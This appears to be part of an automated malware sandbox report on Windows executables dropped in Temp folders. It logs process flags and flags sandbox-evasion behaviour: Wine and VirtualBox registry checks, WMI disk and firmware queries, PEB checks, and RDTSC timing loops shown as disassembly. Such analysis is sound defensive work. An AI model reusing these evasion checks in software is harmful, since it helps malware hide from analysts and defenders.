Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E000B second address: 5DF807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F28C47EE2BEh 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1B71h], esi 0x00000013 pushad 0x00000014 mov edx, dword ptr [ebp+122D27B6h] 0x0000001a call 00007F28C47EE2C7h 0x0000001f xor dword ptr [ebp+122D179Ch], eax 0x00000025 pop edi 0x00000026 popad 0x00000027 push dword ptr [ebp+122D0C41h] 0x0000002d mov dword ptr [ebp+122D2423h], edi 0x00000033 call dword ptr [ebp+122D35E5h] 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F28C47EE2C9h 0x00000040 mov bx, di 0x00000043 popad 0x00000044 clc 0x00000045 xor eax, eax 0x00000047 cmc 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c mov dword ptr [ebp+122D2E76h], eax 0x00000052 mov dword ptr [ebp+122D27C6h], eax 0x00000058 stc 0x00000059 mov esi, 0000003Ch 0x0000005e jnl 00007F28C47EE2CDh 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 pushad 0x00000069 sub bh, 00000056h 0x0000006c sub dword ptr [ebp+122D2E76h], ebx 0x00000072 popad 0x00000073 lodsw 0x00000075 mov dword ptr [ebp+122D2E76h], ecx 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f clc 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007F28C47EE2C5h 0x00000089 nop 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F28C47EE2C0h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753FE8 second address: 753FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753FF0 second address: 753FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75958D second address: 759597 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759597 second address: 75959C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759860 second address: 759891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758087h 0x00000008 jnc 00007F28C4758076h 0x0000000e jmp 00007F28C475807Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7599FA second address: 7599FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7599FE second address: 759A0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F28C4758082h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 759A0C second address: 759A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B656 second address: 75B65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B765 second address: 75B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jmp 00007F28C47EE2BDh 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F28C47EE2C6h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B79A second address: 75B84B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f jmp 00007F28C4758084h 0x00000014 pop esi 0x00000015 pop eax 0x00000016 jmp 00007F28C475807Ch 0x0000001b push 00000003h 0x0000001d sub dword ptr [ebp+122D2568h], ebx 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 mov cx, A4AEh 0x0000002a popad 0x0000002b mov edi, dword ptr [ebp+122D29FAh] 0x00000031 push 00000003h 0x00000033 pushad 0x00000034 jc 00007F28C475807Ch 0x0000003a sub dword ptr [ebp+122D193Dh], ecx 0x00000040 popad 0x00000041 call 00007F28C4758079h 0x00000046 jmp 00007F28C4758084h 0x0000004b push eax 0x0000004c jmp 00007F28C475807Bh 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 push eax 0x00000056 jnp 00007F28C4758078h 0x0000005c pop eax 0x0000005d mov eax, dword ptr [eax] 0x0000005f jmp 00007F28C4758082h 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 push edi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B84B second address: 75B84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B84F second address: 75B853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B935 second address: 75B93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BA82 second address: 75BABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b sub edx, 68AC6C84h 0x00000011 jo 00007F28C475807Ch 0x00000017 mov dword ptr [ebp+122D2FD5h], eax 0x0000001d push 00000000h 0x0000001f mov edx, eax 0x00000021 push 3496FDC6h 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007F28C4758078h 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BABA second address: 75BB82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 3496FD46h 0x00000014 pushad 0x00000015 xor dword ptr [ebp+122D2EFEh], edx 0x0000001b mov dword ptr [ebp+122D2423h], ecx 0x00000021 popad 0x00000022 push 00000003h 0x00000024 jmp 00007F28C47EE2C0h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F28C47EE2B8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000003h 0x00000047 mov dword ptr [ebp+122D2FDFh], ebx 0x0000004d jmp 00007F28C47EE2C9h 0x00000052 call 00007F28C47EE2B9h 0x00000057 push ecx 0x00000058 jmp 00007F28C47EE2C4h 0x0000005d pop ecx 0x0000005e push eax 0x0000005f jmp 00007F28C47EE2C5h 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 push eax 0x00000069 push edx 0x0000006a js 00007F28C47EE2BCh 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BB82 second address: 75BB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BB86 second address: 75BBB0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F28C47EE2B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BBB0 second address: 75BBBA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BBBA second address: 75BBF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d jmp 00007F28C47EE2C0h 0x00000012 pop eax 0x00000013 pop eax 0x00000014 mov dword ptr [ebp+122D2568h], ecx 0x0000001a lea ebx, dword ptr [ebp+1244F5B9h] 0x00000020 mov edx, 1AA54481h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F28C47EE2BAh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75BBF7 second address: 75BC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E5CE second address: 76E5D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E5D4 second address: 76E5E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C4758081h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BC3B second address: 77BC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BC40 second address: 77BC45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BC45 second address: 77BC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C4h 0x00000009 pop ebx 0x0000000a ja 00007F28C47EE2BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BEDD second address: 77BEED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C4758076h 0x00000008 jng 00007F28C4758076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77BEED second address: 77BF10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C47EE2C9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C4D0 second address: 77C4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C4D6 second address: 77C4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C4DA second address: 77C4E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C63A second address: 77C63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C7C9 second address: 77C7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C7D6 second address: 77C7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C7DE second address: 77C7F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F28C4758076h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CABF second address: 77CADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C4h 0x00000007 ja 00007F28C47EE2BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771EFF second address: 771F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CD94 second address: 77CD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D34F second address: 77D38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F28C4758076h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F28C4758076h 0x00000011 popad 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b jmp 00007F28C4758083h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F28C475807Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D4DC second address: 77D4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D4E4 second address: 77D4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D4E8 second address: 77D4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C47EE2BEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D646 second address: 77D67E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758084h 0x00000007 jnc 00007F28C475808Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D67E second address: 77D682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77D682 second address: 77D686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
